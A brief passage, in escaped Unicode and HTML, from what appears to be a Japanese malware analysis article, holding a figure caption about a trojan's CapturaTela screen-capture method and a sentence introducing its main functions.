\u56f39 CapturaTela\u30e1\u30bd\u30c3\u30c9\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30ad\u30e3\u30d7\u30c1\u30e3\u6a5f\u80fd<\/figcaption><\/figure>\n
\u3053\u306e\u60c5\u5831\u7a83\u53d6\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e\u4e3b\u306a\u6a5f\u80fd\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059(\u56f310\u3092\u53c2\u7167)\u3002<\/p>\n